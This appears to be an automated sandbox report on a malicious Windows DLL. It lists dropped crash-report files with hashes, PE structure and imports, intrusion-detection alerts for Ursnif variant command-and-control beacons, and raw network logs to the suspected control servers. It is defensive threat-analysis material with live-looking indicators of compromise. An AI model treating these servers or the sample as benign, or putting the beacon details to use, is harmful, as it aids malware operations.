                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                Number of analysed new started processes analysed:39
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • HDC enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Detection:MAL
                Classification:mal100.troj.evad.winDLL@12/8@6/3
                EGA Information:
                • Successful, ratio: 100%
                HDC Information:
                • Successful, ratio: 50.6% (good quality ratio 44.1%)
                • Quality average: 71.3%
                • Quality standard deviation: 35.5%
                HCA Information:
                • Successful, ratio: 97%
                • Number of executed functions: 0
                • Number of non-executed functions: 0
                Cookbook Comments:
                • Found application associated with file extension: .dll
                • Override analysis time to 240s for rundll32
                • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WerFault.exe, WMIADAP.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
                • Excluded IPs from analysis (whitelisted): 52.182.143.212, 20.42.65.92, 13.107.42.16, 13.107.43.16
                • Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, config.edge.skype.com.trafficmanager.net, eudb.ris.api.iris.microsoft.com, ctldl.windowsupdate.com, arc.msn.com, ris.api.iris.microsoft.com, onedsblobprdeus17.eastus.cloudapp.azure.com, onedsblobprdcus15.centralus.cloudapp.azure.com, login.live.com, l-0007.config.skype.com, config-edge-skype.l-0007.l-msedge.net, blobcollector.events.data.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, l-0007.l-msedge.net, config.edge.skype.com
                • Not all processes where analyzed, report is missing behavior information
                • Report size exceeded maximum capacity and may have missing behavior information.
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
                TimeTypeDescription
                14:20:19API Interceptor2x Sleep call for process: WerFault.exe modified
                No context
                No context
                No context
                No context
                No context
                Process:C:\Windows\SysWOW64\WerFault.exe
                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                Category:dropped
                Size (bytes):65536
                Entropy (8bit):0.6851533365550749
                Encrypted:false
                SSDEEP:96:t3FsJ5pyBy9hyod7Jfk+pXIQcQqc63cE+cw3ktN+a+z+HbHgmownOgtYmZAXGngq:1NiHEzEQ3jC/u7sXS274ItW
                MD5:EBA0D915F4EF0CDE7B93C751A64B71A0
                SHA1:D37844338EF4ED0A156B57E8A767439D8AB90D79
                SHA-256:39CFE32F1433760A7B186DA95D11944FF56452FBE3A36CFEA6A64B23C1E4EBA5
                SHA-512:CC6AAA12CB9D0A7CF3E1995143615019EDAD4C5D52F56A935642BAD88E2CAF9D5563EA9B29BB43C8A4A3A1AFFCF083CF603A4FC49B315F524CA2A989FB3601EF
                Malicious:false
                Reputation:low
                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.1.0.7.7.4.4.2.1.1.1.0.0.5.2.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.1.0.7.7.4.4.2.1.9.0.6.9.3.2.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.7.8.c.f.7.2.b.-.9.8.5.2.-.4.b.c.0.-.8.b.7.5.-.8.9.b.b.1.c.7.9.7.0.1.e.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.6.c.8.0.f.b.9.-.d.6.b.1.-.4.f.0.7.-.b.0.5.9.-.8.c.e.b.9.0.5.7.5.a.2.e.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.l.o.a.d.d.l.l.3.2...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.b.0.4.-.0.0.0.1.-.0.0.1.f.-.f.6.b.3.-.f.3.b.3.c.9.e.4.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.l.o.a.d.d.l.l.3.2...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.
                Process:C:\Windows\SysWOW64\WerFault.exe
                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                Category:dropped
                Size (bytes):65536
                Entropy (8bit):0.6836986625537785
                Encrypted:false
                SSDEEP:96:Ha+F75pyJy9hyoSv7Jn/pXIQcQYGc6MYcEScw3NUS+a+z+HbHgmownOgtYmZAXGK:dMlbHiGAYIRU4jC/u7s8S274ItW
                MD5:8E37D16D620E4EE20A28DAC5F5852321
                SHA1:20181248C028EE61727247044BAFA22E91A6559D
                SHA-256:255674652B01552F8E32D4F1C71DA26B460C16F31C82B9C5BDC63E1E977C45F6
                SHA-512:14009796C75BA0A3C6AD5231CA09165DE05E5903543C68469A7C274F9C585B0852C40BCC297222A861079325F556227F7789253A0085F5A25FD73269E6CC9BCA
                Malicious:false
                Reputation:low
                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.1.0.7.7.4.4.1.7.6.4.2.4.4.3.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.1.0.7.7.4.4.1.8.3.4.5.5.7.0.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.9.f.d.c.8.d.5.-.b.9.4.3.-.4.6.6.a.-.9.c.6.4.-.5.a.2.4.a.f.0.c.f.e.2.9.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.d.e.c.9.3.a.1.-.b.1.9.5.-.4.4.d.0.-.8.6.0.7.-.8.b.8.9.d.e.8.a.b.9.e.3.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.l.o.a.d.d.l.l.3.2...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.b.0.4.-.0.0.0.1.-.0.0.1.f.-.f.6.b.3.-.f.3.b.3.c.9.e.4.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.l.o.a.d.d.l.l.3.2...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.
                Process:C:\Windows\SysWOW64\WerFault.exe
                File Type:Mini DuMP crash report, 15 streams, Thu Oct 20 21:20:17 2022, 0x1205a4 type
                Category:dropped
                Size (bytes):38466
                Entropy (8bit):2.026277388102975
                Encrypted:false
                SSDEEP:192:UzjaOR5OorP8KHxuHhTg/cK5Svh5BE9hrCzgLEdTu:y8oT8KRuB70GBE9hh
                MD5:1073AA02A4DF507608985A4A85A07216
                SHA1:2DCFAAC6CB41BB242DED1C648194D542236488CC
                SHA-256:B354323F2BC10EB484013010D8386E41D692A3E1AC884386BECAD929E4FD2702
                SHA-512:6C19F8ACD64D04EA72B189E729789E8B0919236435018594395FACC9E0C4A6DE9F60E440A61C10CF7B5B39F89794B45B6A0176D84A00545B175DF2FD68D5742B
                Malicious:false
                Preview:MDMP....... .........Qc....................................$...(.......................`.......8...........T...............Z...........L...........8....................................................................U...........B..............GenuineIntelW...........T...........|.Qc.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.........................................................................................................................................................................................................................................................................................................................................................................................................................................
                Process:C:\Windows\SysWOW64\WerFault.exe
                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                Category:dropped
                Size (bytes):8330
                Entropy (8bit):3.6931360749597095
                Encrypted:false
                SSDEEP:192:Rrl7r3GLNiSP6uG6YqrSUQx4gmf3SdmU7aCprX89bjmsfHhm:RrlsNii6/6YGSUQx4gmf3SwdjFf8
                MD5:0E8D7BBC703BB5B35B2C53B75C916BA0
                SHA1:D29311E81DF175126F6B6457A869548F94B207FD
                SHA-256:8C299703037216C1DE0D61C5B879C4663E8316DDBEDA0C21FF8401E52C251C20
                SHA-512:9A19CE285BFBE5452D9B6B3C9A20874A7570C8283BC1EB4EC10CB185A9CD1AF43B23197F3F017BF567E89A4E87332C86581DA28B07F7BB63195A1E6ED223B2B6
                Malicious:false
                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.8.2.0.<./.P.i.d.>.......
                Process:C:\Windows\SysWOW64\WerFault.exe
                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):4598
                Entropy (8bit):4.471059006521791
                Encrypted:false
                SSDEEP:48:cvIwSD8zsdtJgtWI95FWgc8sqYjXe8fm8M4JtCZF/k+q85mwKcQIcQwjid:uITfdHm0grsqYnJw4VwKkwjid
                MD5:D428A8A7AE77C18BA300C2788B331565
                SHA1:B06098EEAB0C2C6D23AA31CE467E5282EFD0CF26
                SHA-256:74D0633427398765B8F35DD4A134F1D0817084613FF040E76717E81F5B7446BC
                SHA-512:A499A4E2250756E973CB26ACDDE6665AB0F3F4E2D01D1168EB489E71DC245A7EF2BFC3171E343F588DFE58981841D07ABAD7287032436E105A47CAE8D7CDA0D0
                Malicious:false
                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1744230" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                Process:C:\Windows\SysWOW64\WerFault.exe
                File Type:Mini DuMP crash report, 15 streams, Thu Oct 20 21:20:21 2022, 0x1205a4 type
                Category:dropped
                Size (bytes):34710
                Entropy (8bit):1.8979685048136985
                Encrypted:false
                SSDEEP:192:IxK3OoX+iuHhTg/LB5Sv65BERDOELrJL/:EoFuBQ7BER
                MD5:570B4A65F1C03EEF65C5616FACCF3456
                SHA1:6F6957D93401F9CDF8C15F9E3288A0B2438D19D7
                SHA-256:B4C9E2345BDEE76E9071928131F3472DAE6280B858469208668120CF7DFE8E92
                SHA-512:8B33656912E434F482FAC5503BDE94020F985E03F7F68C1302BD3C9478E74FC363B0044EBA696080978B9D9CB142FCC78078101D145F7C29054DD76FAC9EEA75
                Malicious:false
                Preview:MDMP....... .........Qc....................................$...(.......................`.......8...........T................x..........L...........8....................................................................U...........B..............GenuineIntelW...........T...........|.Qc.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.........................................................................................................................................................................................................................................................................................................................................................................................................................................
                Process:C:\Windows\SysWOW64\WerFault.exe
                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                Category:dropped
                Size (bytes):8346
                Entropy (8bit):3.7028799521437157
                Encrypted:false
                SSDEEP:192:Rrl7r3GLNiSa6N6Yq0SUfDwrZcgmfKSAMaCpDw89bhmsfhrm:RrlsNiH6N6Y5SUf0rZcgmfKSxhFfQ
                MD5:01A46D4738076CA62CDC1D28C74685BE
                SHA1:B26216E5B48E88E891F9CEA76E9C55C55AD117F9
                SHA-256:31A4642A9C2CD6A5D50222319081DDB285F34A0A7343A214FAACB69164FBEA50
                SHA-512:262ECDBB85144CE8C64AFB32C29DF7509677B13DB46EC43AA36A90D9CB4D4D863F3CD0F15C1CD742F8B3FB0AB83FECB18CDEBF7EFDD20D8BA874179C06DCE300
                Malicious:false
                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.8.2.0.<./.P.i.d.>.......
                Process:C:\Windows\SysWOW64\WerFault.exe
                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):4608
                Entropy (8bit):4.4836666966848
                Encrypted:false
                SSDEEP:48:cvIwSD8zsUJgtWI95FWgc8sqYjh8fm8M4JtRZFhcM+q8I8wKcQIcQwjid:uITfSm0grsqYCJP7wwKkwjid
                MD5:EE6034CF18225466082F87E34F422984
                SHA1:6C069D18AE2B5E2A38E2A2442E602183197CBD65
                SHA-256:303A098574CC0028B25AE503A6D0948F870C64F014613393B08530ACFF806F00
                SHA-512:2F458C56D669BC58A2DB89B2A31DD9A3FBB1BF082D32F3EDCE5248E6B81D6FD4AAA9854CC4F4C6C2E8E0A3DE061288279FC058B395B6AF3BE966E090EFEE6971
                Malicious:false
                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1744231" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                File type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                Entropy (8bit):5.711952386794399
                TrID:
                • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                • Generic Win/DOS Executable (2004/3) 0.20%
                • DOS Executable Generic (2002/1) 0.20%
                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                File name:cVZ5IwmAMe.dll
                File size:118784
                MD5:17ddc738604a040176b85c80173c5090
                SHA1:75db1976ccc16912d4f1d4fc68b8c8975ad39ac4
                SHA256:4c0ccba038ff513555223a880da3760a974b0479fe6cf0e823f08774ecd0d9ba
                SHA512:1b9328608a3347822168d3a57d5b2cf7c52bb0f60aa76456409f33029cae22e89a5692d54b29e6c581b287a7376f066382eda3d6a2443389358f6bb40d19a483
                SSDEEP:3072:q14Nm3YTyGi7bLYB0s7+Ec7V6bW2nnW6rifrQc1+lUmT:CvOwYB0v72n6rQA+b
                TLSH:74C3BFBCB604E9F1DB5F1677CD8A385813B176138A8BF5C864A0B6C3093376BEE42945
                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............a...a...a..r....a...a...a..r....a..r....a..r....a..Rich.a..........................PE..L.....Nc...........!.....^...n.....
                Icon Hash:74f0e4ecccdce0e4
                Entrypoint:0x10000000
                Entrypoint Section:
                Digitally signed:false
                Imagebase:0x10000000
                Subsystem:windows cui
                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
                Time Stamp:0x634E8DD0 [Tue Oct 18 11:28:16 2022 UTC]
                TLS Callbacks:
                CLR (.Net) Version:
                OS Version Major:6
                OS Version Minor:0
                File Version Major:6
                File Version Minor:0
                Subsystem Version Major:6
                Subsystem Version Minor:0
                Import Hash:4d77c77461545176d90bd7e3496b7f55
                Instruction
                dec ebp
                pop edx
                nop
                add byte ptr [ebx], al
                add byte ptr [eax], al
                add byte ptr [eax+eax], al
                add byte ptr [eax], al
                NameVirtual AddressVirtual Size Is in Section
                IMAGE_DIRECTORY_ENTRY_EXPORT0x70400x50.rdata
                IMAGE_DIRECTORY_ENTRY_IMPORT0x716c0x28.rdata
                IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                IMAGE_DIRECTORY_ENTRY_BASERELOC0x1f0000x1c.reloc
                IMAGE_DIRECTORY_ENTRY_DEBUG0x70200x1c.rdata
                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_IAT0x70000x20.rdata
                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                .text0x10000x5ce20x5e00False0.7414810505319149DOS executable (COM)7.128336096292264IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                .rdata0x70000x25a0x400False0.3603515625data2.902396649404867IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                .sdfg0x80000x166620x16800False0.5603732638888889data4.600602076488314IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .reloc0x1f0000x1c0x200False1.021484375data7.422426283737699IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                DLLImport
                KERNEL32.dllCreateEventW, VirtualAllocEx, GetConsoleMode, GetConsoleScreenBufferInfo, SetConsoleWindowInfo, SetConsoleDisplayMode, WaitForSingleObject
                NameOrdinalAddress
                DllRegisterServer10x1000101b
                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                192.168.2.362.173.145.18349779802033204 10/20/22-14:22:35.988557TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4977980192.168.2.362.173.145.183
                192.168.2.38.8.8.853844532023883 10/20/22-14:22:35.055566UDP2023883ET DNS Query to a *.top domain - Likely Hostile5384453192.168.2.38.8.8.8
                192.168.2.38.8.8.856042532023883 10/20/22-14:20:53.394754UDP2023883ET DNS Query to a *.top domain - Likely Hostile5604253192.168.2.38.8.8.8
                192.168.2.313.107.42.1649746802033203 10/20/22-14:20:38.516902TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4974680192.168.2.313.107.42.16
                192.168.2.313.107.42.1649783802033203 10/20/22-14:23:00.375733TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4978380192.168.2.313.107.42.16
                192.168.2.362.173.145.18349781802033204 10/20/22-14:22:43.698697TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4978180192.168.2.362.173.145.183
                192.168.2.362.173.145.18349781802033203 10/20/22-14:22:43.698697TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4978180192.168.2.362.173.145.183
                192.168.2.313.107.42.1649737802033204 10/20/22-14:20:33.133617TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4973780192.168.2.313.107.42.16
                192.168.2.313.107.42.1649782802033203 10/20/22-14:22:56.111849TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4978280192.168.2.313.107.42.16
                192.168.2.313.107.42.1649737802033203 10/20/22-14:20:33.133617TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4973780192.168.2.313.107.42.16
                192.168.2.313.107.43.1649784802033203 10/20/22-14:23:03.824569TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4978480192.168.2.313.107.43.16
                192.168.2.313.107.43.1649754802033203 10/20/22-14:20:41.475087TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4975480192.168.2.313.107.43.16
                192.168.2.313.107.43.1649754802033204 10/20/22-14:20:41.475087TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4975480192.168.2.313.107.43.16
                192.168.2.362.173.145.18349780802033204 10/20/22-14:22:40.268484TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4978080192.168.2.362.173.145.183
                192.168.2.362.173.145.18349780802033203 10/20/22-14:22:40.268484TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4978080192.168.2.362.173.145.183
                TimestampSource PortDest PortSource IPDest IP
                Oct 20, 2022 14:20:53.505629063 CEST4975680192.168.2.331.41.44.194
                Oct 20, 2022 14:20:56.517848015 CEST4975680192.168.2.331.41.44.194
                Oct 20, 2022 14:20:59.106730938 CEST4975780192.168.2.331.41.44.194
                Oct 20, 2022 14:21:02.111588001 CEST4976080192.168.2.331.41.44.194
                Oct 20, 2022 14:21:02.112009048 CEST4975780192.168.2.331.41.44.194
                Oct 20, 2022 14:21:02.533972979 CEST4975680192.168.2.331.41.44.194
                Oct 20, 2022 14:21:05.112322092 CEST4976080192.168.2.331.41.44.194
                Oct 20, 2022 14:21:08.112577915 CEST4975780192.168.2.331.41.44.194
                Oct 20, 2022 14:21:11.112884045 CEST4976080192.168.2.331.41.44.194
                Oct 20, 2022 14:22:35.461960077 CEST4977980192.168.2.362.173.145.183
                Oct 20, 2022 14:22:35.524513006 CEST804977962.173.145.183192.168.2.3
                Oct 20, 2022 14:22:35.524663925 CEST4977980192.168.2.362.173.145.183
                Oct 20, 2022 14:22:35.988557100 CEST4977980192.168.2.362.173.145.183
                Oct 20, 2022 14:22:36.051074982 CEST804977962.173.145.183192.168.2.3
                Oct 20, 2022 14:22:36.051137924 CEST804977962.173.145.183192.168.2.3
                Oct 20, 2022 14:22:36.051347017 CEST4977980192.168.2.362.173.145.183
                Oct 20, 2022 14:22:36.054837942 CEST4977980192.168.2.362.173.145.183
                Oct 20, 2022 14:22:36.116928101 CEST804977962.173.145.183192.168.2.3
                Oct 20, 2022 14:22:40.208168030 CEST4978080192.168.2.362.173.145.183
                Oct 20, 2022 14:22:40.267550945 CEST804978062.173.145.183192.168.2.3
                Oct 20, 2022 14:22:40.267811060 CEST4978080192.168.2.362.173.145.183
                Oct 20, 2022 14:22:40.268484116 CEST4978080192.168.2.362.173.145.183
                Oct 20, 2022 14:22:40.327392101 CEST804978062.173.145.183192.168.2.3
                Oct 20, 2022 14:22:40.327450037 CEST804978062.173.145.183192.168.2.3
                Oct 20, 2022 14:22:40.327558994 CEST4978080192.168.2.362.173.145.183
                Oct 20, 2022 14:22:40.327680111 CEST4978080192.168.2.362.173.145.183
                Oct 20, 2022 14:22:40.386451006 CEST804978062.173.145.183192.168.2.3
                Oct 20, 2022 14:22:43.633698940 CEST4978180192.168.2.362.173.145.183
                Oct 20, 2022 14:22:43.696523905 CEST804978162.173.145.183192.168.2.3
                Oct 20, 2022 14:22:43.696702957 CEST4978180192.168.2.362.173.145.183
                Oct 20, 2022 14:22:43.698697090 CEST4978180192.168.2.362.173.145.183
                Oct 20, 2022 14:22:43.762449980 CEST804978162.173.145.183192.168.2.3
                Oct 20, 2022 14:22:43.762501955 CEST804978162.173.145.183192.168.2.3
                Oct 20, 2022 14:22:43.762659073 CEST4978180192.168.2.362.173.145.183
                Oct 20, 2022 14:22:43.762937069 CEST4978180192.168.2.362.173.145.183
                Oct 20, 2022 14:22:43.825541019 CEST804978162.173.145.183192.168.2.3
                Oct 20, 2022 14:23:16.160958052 CEST4978580192.168.2.331.41.44.194
                Oct 20, 2022 14:23:19.156286001 CEST4978580192.168.2.331.41.44.194
                Oct 20, 2022 14:23:20.418081045 CEST4978680192.168.2.331.41.44.194
                Oct 20, 2022 14:23:23.422476053 CEST4978680192.168.2.331.41.44.194
                Oct 20, 2022 14:23:23.881475925 CEST4978780192.168.2.331.41.44.194
                Oct 20, 2022 14:23:25.156793118 CEST4978580192.168.2.331.41.44.194
                Oct 20, 2022 14:23:26.891458035 CEST4978780192.168.2.331.41.44.194
                Oct 20, 2022 14:23:29.422972918 CEST4978680192.168.2.331.41.44.194
                Oct 20, 2022 14:23:32.907465935 CEST4978780192.168.2.331.41.44.194
                TimestampSource PortDest PortSource IPDest IP
                Oct 20, 2022 14:20:53.394753933 CEST5604253192.168.2.38.8.8.8
                Oct 20, 2022 14:20:53.499351978 CEST53560428.8.8.8192.168.2.3
